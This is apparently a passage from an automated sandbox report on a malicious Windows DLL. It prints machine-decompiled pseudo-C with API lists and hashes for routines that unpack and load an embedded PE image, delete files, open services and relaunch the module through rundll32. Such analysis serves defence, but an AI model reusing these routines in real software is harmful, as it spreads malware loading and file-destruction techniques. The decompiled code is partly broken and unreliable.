                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,TVRF_Instance), ref: 6F3351C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3351D2
                                                                                                                        • wsprintfA.USER32 ref: 6F33520D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandleOpenwsprintf
                                                                                                                        • String ID: "%s%s" "%s",#%d %c "%s"$TVRF_Instance$rundll32.exe
                                                                                                                        • API String ID: 3063877008-2939335533
                                                                                                                        • Opcode ID: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction ID: 6cbb97e43f4a80142bbc268f1e261c37de654f333b52529154985c0ec639c8af
                                                                                                                        • Opcode Fuzzy Hash: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction Fuzzy Hash: 1601F2B2E94791ABEF60E724CC55BA237AEE755725F40120CF824851D0E679A168CB22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332E59, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332E59(struct _WIN32_FIND_DATAA _a16, char _a60, char _a336, char _a344) {
				signed char _t9;
				CHAR* _t16;
				void* _t18;
				void* _t23;
				void* _t28;

				do {
					_t9 = _a16.dwFileAttributes;
					if((_t9 & 0x00000010) == 0 && _t9 != 0) {
						wsprintfA( &_a336, "%s%s", _t18,  &_a60);
						_t28 = _t28 + 0x10;
						_t16 = DeleteFileA( &_a344);
						if(_t16 == 0) {
							MoveFileExA( &_a344, _t16, 4);
						}
					}
				} while (FindNextFileA(_t23,  &_a16) != 0);
				FindClose(_t23);
				return 1;
			}








                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e66
                                                                                                                        0x6f332e7f
                                                                                                                        0x6f332e81
                                                                                                                        0x6f332e8c
                                                                                                                        0x6f332e94
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea7
                                                                                                                        0x6f332eb8
                                                                                                                        0x6f332ebd
                                                                                                                        0x6f332ecf

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDeleteMoveNextwsprintf
                                                                                                                        • String ID: %s%s
                                                                                                                        • API String ID: 2350977733-3252725368
                                                                                                                        • Opcode ID: 0a064f2c1c9305de79f711fe0e148262895fa60d3bf8f0f154ac57577debe10b
                                                                                                                        • Instruction ID: a3a286cadaac2dc96a2b7dabb0799e1fb389ab9fab46922d5442e8941c6f4190
                                                                                                                        • Opcode Fuzzy Hash: 0a064f2c1c9305de79f711fe0e148262895fa60d3bf8f0f154ac57577debe10b
                                                                                                                        • Instruction Fuzzy Hash: 1BF04F73A04395ABD760DAA4CC49FEB73ADEF85721F40081DF994D6200EB76E1149692
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334A20, Relevance: 9.2, APIs: 6, Instructions: 192commemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 38%
                                                                                                                        			E6F334A20() {
				char _v4;
				char _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				char _v72;
				intOrPtr* _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				intOrPtr _v140;
				intOrPtr* _v148;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t94;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t111;
				void* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr _t157;
				intOrPtr* _t158;

				_t158 = __imp__CoCreateInstance;
				_push( &_v16);
				_push(0x6f33e08c);
				_push(1);
				_push(0);
				_push(0x6f33e0cc);
				_v12 = 0;
				_v4 = 0;
				_v16 = 0;
				if( *_t158() < 0) {
					L26:
					return _v32;
				}
				_t67 = _v36;
				_v40 = 0;
				_push( &_v40);
				_push(_t67);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
					L25:
					_t70 = _v44;
					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
					if(_v36 != 0) {
						return 1;
					}
					goto L26;
				}
				_t73 = _v48;
				_v52 = 0;
				_push( &_v52);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
					L24:
					_t76 = _v56;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L25;
				} else {
					_t78 = _v60;
					_v44 = 0;
					_push( &_v44);
					_push(_t78);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
						_v48 = 1;
					}
					_t81 = _v68;
					_v72 = 0;
					_push( &_v72);
					_push(_t81);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
						L23:
						_t84 = _v76;
						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
						goto L24;
					}
					_t154 = __imp__#2;
					_t151 =  *_t154(_v44, _t150, _t153);
					if(_t151 == 0) {
						L22:
						_t87 = _v84;
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
						goto L23;
					}
					_t89 = _v84;
					_push( &_v88);
					_v88 = 0;
					_push(_t151);
					_push(_t89);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
						if(_v64 != 0) {
							_t156 =  *_t154(_v56);
							if(_t156 != 0) {
								_push( &_v104);
								_push(0x6f33e05c);
								_push(1);
								_push(0);
								_push(0x6f33e0ac);
								if( *_t158() >= 0) {
									_t94 = _v124;
									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
									_t97 = _v132;
									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
									_t99 = _v136;
									_push(_v140);
									_push(_t99);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
										_v128 = 1;
									}
									_t102 = _v148;
									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
								}
								__imp__#6(_t156);
							}
						}
						L21:
						__imp__#6(_t151);
						goto L22;
					}
					_t157 = _v52;
					if(_t157 == 0) {
						_t108 = _v100;
						_v80 = 0;
						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
						if(_v88 == 0) {
							_t111 = _v108;
							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
						}
					}
					_t104 = _v100;
					_v80 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
					if(_t157 != 0) {
						_t106 = _v100;
						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
					}
					goto L21;
				}
			}






















































                                                                                                                        0x6f334a25
                                                                                                                        0x6f334a2f
                                                                                                                        0x6f334a30
                                                                                                                        0x6f334a37
                                                                                                                        0x6f334a39
                                                                                                                        0x6f334a3a
                                                                                                                        0x6f334a3f
                                                                                                                        0x6f334a43
                                                                                                                        0x6f334a47
                                                                                                                        0x6f334a4f
                                                                                                                        0x6f334c1d
                                                                                                                        0x00000000
                                                                                                                        0x6f334c1d
                                                                                                                        0x6f334a55
                                                                                                                        0x6f334a5d
                                                                                                                        0x6f334a63
                                                                                                                        0x6f334a64
                                                                                                                        0x6f334a6c
                                                                                                                        0x6f334c06
                                                                                                                        0x6f334c06
                                                                                                                        0x6f334c10
                                                                                                                        0x6f334c1b
                                                                                                                        0x6f334c26
                                                                                                                        0x6f334c26
                                                                                                                        0x00000000
                                                                                                                        0x6f334c1b
                                                                                                                        0x6f334a72
                                                                                                                        0x6f334a7a
                                                                                                                        0x6f334a80
                                                                                                                        0x6f334a81
                                                                                                                        0x6f334a89
                                                                                                                        0x6f334bfa
                                                                                                                        0x6f334bfa
                                                                                                                        0x6f334c04
                                                                                                                        0x00000000
                                                                                                                        0x6f334a8f
                                                                                                                        0x6f334a8f
                                                                                                                        0x6f334a97
                                                                                                                        0x6f334a9d
                                                                                                                        0x6f334a9e
                                                                                                                        0x6f334aa6
                                                                                                                        0x6f334aaf
                                                                                                                        0x6f334aaf
                                                                                                                        0x6f334ab7
                                                                                                                        0x6f334abf
                                                                                                                        0x6f334ac5
                                                                                                                        0x6f334ac6
                                                                                                                        0x6f334ace
                                                                                                                        0x6f334bee
                                                                                                                        0x6f334bee
                                                                                                                        0x6f334bf8
                                                                                                                        0x00000000
                                                                                                                        0x6f334bf8
                                                                                                                        0x6f334ad9
                                                                                                                        0x6f334ae3
                                                                                                                        0x6f334ae7
                                                                                                                        0x6f334be0
                                                                                                                        0x6f334be0
                                                                                                                        0x6f334bea
                                                                                                                        0x00000000
                                                                                                                        0x6f334bed
                                                                                                                        0x6f334aed
                                                                                                                        0x6f334af5
                                                                                                                        0x6f334af6
                                                                                                                        0x6f334aff
                                                                                                                        0x6f334b00
                                                                                                                        0x6f334b05
                                                                                                                        0x6f334b68
                                                                                                                        0x6f334b71
                                                                                                                        0x6f334b75
                                                                                                                        0x6f334b7b
                                                                                                                        0x6f334b7c
                                                                                                                        0x6f334b81
                                                                                                                        0x6f334b83
                                                                                                                        0x6f334b84
                                                                                                                        0x6f334b8d
                                                                                                                        0x6f334b8f
                                                                                                                        0x6f334b9a
                                                                                                                        0x6f334b9c
                                                                                                                        0x6f334ba7
                                                                                                                        0x6f334ba9
                                                                                                                        0x6f334bb3
                                                                                                                        0x6f334bb4
                                                                                                                        0x6f334bbc
                                                                                                                        0x6f334bbe
                                                                                                                        0x6f334bbe
                                                                                                                        0x6f334bc6
                                                                                                                        0x6f334bd0
                                                                                                                        0x6f334bd0
                                                                                                                        0x6f334bd3
                                                                                                                        0x6f334bd3
                                                                                                                        0x6f334b75
                                                                                                                        0x6f334bd9
                                                                                                                        0x6f334bda
                                                                                                                        0x00000000
                                                                                                                        0x6f334bda
                                                                                                                        0x6f334b07
                                                                                                                        0x6f334b0d
                                                                                                                        0x6f334b0f
                                                                                                                        0x6f334b17
                                                                                                                        0x6f334b22
                                                                                                                        0x6f334b29
                                                                                                                        0x6f334b2b
                                                                                                                        0x6f334b37
                                                                                                                        0x6f334b37
                                                                                                                        0x6f334b29
                                                                                                                        0x6f334b39
                                                                                                                        0x6f334b43
                                                                                                                        0x6f334b4b
                                                                                                                        0x6f334b4f
                                                                                                                        0x6f334b55
                                                                                                                        0x6f334b60
                                                                                                                        0x6f334b60
                                                                                                                        0x00000000
                                                                                                                        0x6f334b4f

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0CC,00000000,00000001,6F33E08C,?), ref: 6F334A4B
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334AE1
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334B6F
                                                                                                                        • CoCreateInstance.OLE32(6F33E0AC,00000000,00000001,6F33E05C,?), ref: 6F334B89
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BD3
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BDA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocCreateFreeInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 391255401-0
                                                                                                                        • Opcode ID: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction ID: 359980d816cf8c03f42de83bd4fb8e16698a513408babbae4aae24d11eee666f
                                                                                                                        • Opcode Fuzzy Hash: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction Fuzzy Hash: BA61C0B6604396AFD700DF99C880A5AB7E9BFC9304F104A5DF5998B250D732EC46CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332260, Relevance: 9.1, APIs: 6, Instructions: 84filememoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332260(CHAR* _a4, long* _a8) {
				long _v4;
				long _v8;
				void* _t21;
				long _t27;
				intOrPtr* _t30;
				void* _t33;

				_t21 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t21 == 0xffffffff) {
					return 0;
				} else {
					_t27 = GetFileSize(_t21, 0);
					if(_t27 == 0) {
						return 0;
					} else {
						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
						if(_t33 == 0) {
							L6:
							return 0;
						} else {
							_v4 = 0;
							ReadFile(_t21, _t33, _t27,  &_v4, 0);
							CloseHandle(_t21);
							_v8 = 0;
							_t30 = E6F332190(_t33, _t27,  &_v8);
							VirtualFree(_t33, 0, 0x8000);
							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
								goto L6;
							} else {
								 *_a8 = _v8;
								return _t30;
							}
						}
					}
				}
			}









                                                                                                                        0x6f332282
                                                                                                                        0x6f332287
                                                                                                                        0x6f332335
                                                                                                                        0x6f33228d
                                                                                                                        0x6f332296
                                                                                                                        0x6f33229a
                                                                                                                        0x6f33232d
                                                                                                                        0x6f3322a0
                                                                                                                        0x6f3322af
                                                                                                                        0x6f3322b3
                                                                                                                        0x6f33231c
                                                                                                                        0x6f332324
                                                                                                                        0x6f3322b5
                                                                                                                        0x6f3322bf
                                                                                                                        0x6f3322c7
                                                                                                                        0x6f3322ce
                                                                                                                        0x6f3322db
                                                                                                                        0x6f3322f3
                                                                                                                        0x6f3322f5
                                                                                                                        0x6f3322fd
                                                                                                                        0x00000000
                                                                                                                        0x6f332309
                                                                                                                        0x6f332315
                                                                                                                        0x6f33231b
                                                                                                                        0x6f33231b
                                                                                                                        0x6f3322fd
                                                                                                                        0x6f3322b3
                                                                                                                        0x6f33229a

                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6F33227C
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 6F332290
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 6F3322A9
                                                                                                                        • ReadFile.KERNEL32 ref: 6F3322C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3322CE
                                                                                                                          • Part of subcall function 6F332190: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                          • Part of subcall function 6F332190: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                          • Part of subcall function 6F332190: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3322F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3075244933-0
                                                                                                                        • Opcode ID: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction ID: 9da5b79b79cb42aab962a2fd186ff172f70713cce5bba903bec4399c73d9ee20
                                                                                                                        • Opcode Fuzzy Hash: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction Fuzzy Hash: DE212B3770076067D6209A65AC49F8B7BADEBC5B32F10051AF904D7280E675E41987F1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332190, Relevance: 9.1, APIs: 6, Instructions: 79memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332190(void* _a4, long _a8, intOrPtr* _a12) {
				long _v4;
				long _v8;
				intOrPtr* _v22;
				long _v30;
				intOrPtr _v42;
				intOrPtr _t18;
				long _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t37 = _a4;
				_t34 = _a8;
				_v8 = 0;
				_v4 = 0;
				do {
					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
					if(_t36 == 0) {
						goto L4;
					} else {
						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
							if(_t35 == 0) {
								break;
							} else {
								RtlMoveMemory(_t35, _t36, _v30);
								VirtualFree(_t36, 0, 0x8000);
								 *_v22 = _v42;
								return _t35;
							}
						} else {
							VirtualFree(_t36, 0, 0x8000);
							_t34 = _t34 + _t34;
							goto L4;
						}
					}
					L8:
					L4:
					_t18 = _v4 + 1;
					_v4 = _t18;
				} while (_t18 < 0x1e);
				 *_a12 = _v8;
				return 0;
				goto L8;
			}













                                                                                                                        0x6f33219b
                                                                                                                        0x6f3321a3
                                                                                                                        0x6f3321a7
                                                                                                                        0x6f3321ab
                                                                                                                        0x6f3321b0
                                                                                                                        0x6f3321bc
                                                                                                                        0x6f3321c0
                                                                                                                        0x00000000
                                                                                                                        0x6f3321c2
                                                                                                                        0x6f3321db
                                                                                                                        0x6f33221f
                                                                                                                        0x6f332223
                                                                                                                        0x00000000
                                                                                                                        0x6f332225
                                                                                                                        0x6f33222c
                                                                                                                        0x6f332239
                                                                                                                        0x6f332247
                                                                                                                        0x6f332252
                                                                                                                        0x6f332252
                                                                                                                        0x6f3321dd
                                                                                                                        0x6f3321e5
                                                                                                                        0x6f3321eb
                                                                                                                        0x00000000
                                                                                                                        0x6f3321eb
                                                                                                                        0x6f3321db
                                                                                                                        0x00000000
                                                                                                                        0x6f3321ed
                                                                                                                        0x6f3321f1
                                                                                                                        0x6f3321f2
                                                                                                                        0x6f3321f6
                                                                                                                        0x6f332206
                                                                                                                        0x6f33220e
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F33221D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F33222C
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 6F332239
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201667072-0
                                                                                                                        • Opcode ID: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction ID: 1ffc6b527c721d7b521e819dfbfee453cf54da3b88b65d014aa4ecc915c3e9fa
                                                                                                                        • Opcode Fuzzy Hash: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction Fuzzy Hash: F721AE726443516BD310CE199D41F6BB3E8FBC9B21F10091DF684E7280DB60E8098AA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3338A0, Relevance: 9.1, APIs: 6, Instructions: 63serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F3338A0(char* _a4, char** _a8, int _a12, signed int _a16) {
				char* _t5;
				void* _t14;
				int _t19;
				void* _t24;
				void* _t25;
				signed int _t27;

				_t19 = 0;
				_t5 = OpenSCManagerA(0, 0, 0xf003f);
				_t25 = _t5;
				if(_t25 != 0) {
					L2:
					_t27 = _a16;
					asm("sbb eax, eax");
					_t24 = OpenServiceA(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
					if(_t24 == 0) {
						L6:
						CloseServiceHandle(_t25);
						goto L7;
					} else {
						if(_t27 != 0) {
							_t19 = 1;
							goto L6;
						} else {
							_t14 = E6F3337D0(_t24, _a8, _a12);
							CloseServiceHandle(_t24);
							CloseServiceHandle(_t25);
							return _t14;
						}
					}
				} else {
					_t25 = OpenSCManagerA(_t5, _t5, 1);
					if(_t25 == 0) {
						L7:
						return _t19;
					} else {
						goto L2;
					}
				}
			}









                                                                                                                        0x6f3338ae
                                                                                                                        0x6f3338b2
                                                                                                                        0x6f3338b4
                                                                                                                        0x6f3338b8
                                                                                                                        0x6f3338c6
                                                                                                                        0x6f3338cb
                                                                                                                        0x6f3338d3
                                                                                                                        0x6f3338e8
                                                                                                                        0x6f3338ec
                                                                                                                        0x6f333921
                                                                                                                        0x6f333922
                                                                                                                        0x00000000
                                                                                                                        0x6f3338ee
                                                                                                                        0x6f3338f0
                                                                                                                        0x6f33391c
                                                                                                                        0x00000000
                                                                                                                        0x6f3338f2
                                                                                                                        0x6f3338fd
                                                                                                                        0x6f333908
                                                                                                                        0x6f33390f
                                                                                                                        0x6f33391b
                                                                                                                        0x6f33391b
                                                                                                                        0x6f3338f0
                                                                                                                        0x6f3338ba
                                                                                                                        0x6f3338c0
                                                                                                                        0x6f3338c4
                                                                                                                        0x6f33392b
                                                                                                                        0x6f33392e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3338c4

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00000000,00000000,6F33709F,0099B240,00000000,00000000,00000001,?,00000000), ref: 6F3338B2
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F3338BE
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,?,?), ref: 6F3338E2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6F333908
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F33390F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F333922
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4196757001-0
                                                                                                                        • Opcode ID: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction ID: 60893e5dad7e7ba502457eb07b1cbd069f2583410f47a50608a289a6c24bd7c8
                                                                                                                        • Opcode Fuzzy Hash: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction Fuzzy Hash: 4E01F9B3B05A69ABD7119A789C859BBB39DDFC5661F04012AFA40D7200DB66DC0546A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334FE0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 60%
                                                                                                                        			E6F334FE0(intOrPtr _a4) {
				char* _v0;
				char _v264;
				char _v272;
				char* _t9;
				int _t10;
				void* _t11;
				intOrPtr _t15;
				void* _t21;
				void* _t22;

				_t21 =  &_v264;
				_push(0x105);
				_push( &_v264);
				L6F33C2EE();
				_t9 = _v0;
				if(_t9 == 0) {
					_t9 = M6F340530; // 0x997378
				}
				_t10 = wsprintfA( &_v272, "\"%s\"", _t9);
				_t15 = _a4;
				_t22 = _t21 + 0xc;
				if(_t15 > 0) {
					wsprintfA(_t22 + _t10 + 8, " w %d", _t15);
					_t22 = _t22 + 0xc;
				}
				_t11 = M6F3404D4; // 0x988bb8
				_push(_t11);
				_push(0);
				_push(0);
				_push(0);
				return E6F334EF0( &_v264, 1, 0);
			}












                                                                                                                        0x6f334fe0
                                                                                                                        0x6f334fe6
                                                                                                                        0x6f334fef
                                                                                                                        0x6f334ff0
                                                                                                                        0x6f334ff5
                                                                                                                        0x6f334ffe
                                                                                                                        0x6f335000
                                                                                                                        0x6f335000
                                                                                                                        0x6f335017
                                                                                                                        0x6f335019
                                                                                                                        0x6f335020
                                                                                                                        0x6f335025
                                                                                                                        0x6f335032
                                                                                                                        0x6f335034
                                                                                                                        0x6f335034
                                                                                                                        0x6f335037
                                                                                                                        0x6f33503c
                                                                                                                        0x6f33503d
                                                                                                                        0x6f33503f
                                                                                                                        0x6f335041
                                                                                                                        0x6f33505b

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$MemoryZero
                                                                                                                        • String ID: w %d$"%s"
                                                                                                                        • API String ID: 3693688802-504233264
                                                                                                                        • Opcode ID: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction ID: d7e8c9fe9642e7e2dd183943a42b91e8614807a1d19678c65d97b6b3a4a52554
                                                                                                                        • Opcode Fuzzy Hash: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
